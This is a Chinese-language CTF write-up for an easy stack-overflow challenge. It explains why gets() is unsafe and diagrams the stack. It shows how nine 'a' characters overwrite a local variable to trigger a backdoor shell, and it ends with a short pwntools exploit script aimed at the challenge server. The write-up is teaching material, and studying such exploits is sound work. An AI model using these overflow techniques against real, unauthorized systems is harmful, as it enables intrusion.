【PWN】HappyNewYearCTF_2_栈上变量覆写1

题目地址:https://ctf.cssec.cc/games/25/challenges

Author: Sonder

Difficulty: Easy

Category: 栈溢出


gets函数是C语言中的一个函数,用于读取一行文本。这个函数的问题在于,它不会检查输入的长度,所以如果输入的文本超过了目标缓冲区的大小,就会导致栈溢出

这是因为gets函数不知道你为字符串分配了多少内存,它会一直读取输入,直到遇到换行符或EOF。如果输入的数据超过了你分配的内存,gets就会把多余的数据写入其他内存区域,这就可能覆盖其他的变量或者程序的执行代码,导致程序崩溃或者其他未定义的行为

解题

首先checksec,可以看到保护全开,接下来IDA逆向看下。

通过IDA分析,可以发现,当v5=97时,会执行func(sh),我们进一步来看,可以发现实际func(sh)是一个后门函数,可以直接给到shell

接下来,分析一下溢出点,可以看到format是8个字节,但此时是通过gets进行输入,之前文章我们已经介绍过,gets是读取一行字符串到变量中,直到遇到换行停止。

故这里肯定存在溢出。那如何溢出到v5。我们进一步分析栈空间。

复制代码
  High
  Address |                 |
          +-----------------+  <-- rbp + 0x8
          | return address  |  (8字节,函数返回地址)
          +-----------------+  <-- rbp (栈基址寄存器)
          | old rbp         |  (8字节,调用者的栈基址)
          +-----------------+  <-- rbp - 0x8
          | canary value    |  (8字节,栈保护值)
          +-----------------+  <-- rbp - 0x10
          | v5 (__int64)    |  (8字节,局部变量)
          +-----------------+  <-- rbp - 0x18
          | format[8]       |  (8字节,可控的格式化字符串)
  Low     |                 |
  Address

通过栈空间,可以发现,本题中canary实际并无影响,只需通过format溢出到v5即可。

97是a的ASCII码,故我们只需要输入8个字符加一个a即可,在这里我输入9个a,可见下图溢出成功,获取管理权限

exp编写

截止目前,已经可以成功获取flag,但是本着学习的原则。我们仍需进一步编写exp。

py 复制代码
from pwn import *

# 设置日志级别debug,可以打印更多log
context.log_level = 'debug'
HOST = 'challenges.ctf.cssec.cc'
PORT = 32779

r = remote(HOST,PORT)

# 获取输出内容,
r.recvuntil('I will show it.')

exp = 'a'*9
# 发送exp
r.sendline(exp)
# 开始交互
r.interactive()
相关推荐
内心如初2 小时前
12_等保系列之网络安全架构整理
网络安全·等保测评·等保测评从0-1·等保测评笔记
寻址000000012 小时前
华三(H3C)交换机基本运维命令及配置案例说明
运维·网络
头发还没掉光光2 小时前
解决TCP粘包问题,使用C++实现TCP通信的自定义协议设计
linux·网络·c++·网络协议·tcp/ip
Eira-Z2 小时前
漏洞挖掘--指纹识别
安全
码农阿豪2 小时前
实战指南:高效批量测试SSH连接的最佳实践与避坑手册
运维·ssh
hzb666662 小时前
basectf2024
开发语言·python·sql·学习·安全·web安全·php
wheeldown2 小时前
【Linux网络编程】应用层自定义协议和序列化
linux·运维·网络
晚风吹长发2 小时前
初步理解Linux中的信号概念以及信号产生
linux·运维·服务器·算法·缓冲区·inode
历程里程碑3 小时前
Linux 4 指令结尾&&通过shell明白指令实现的原理
linux·c语言·数据结构·笔记·算法·排序算法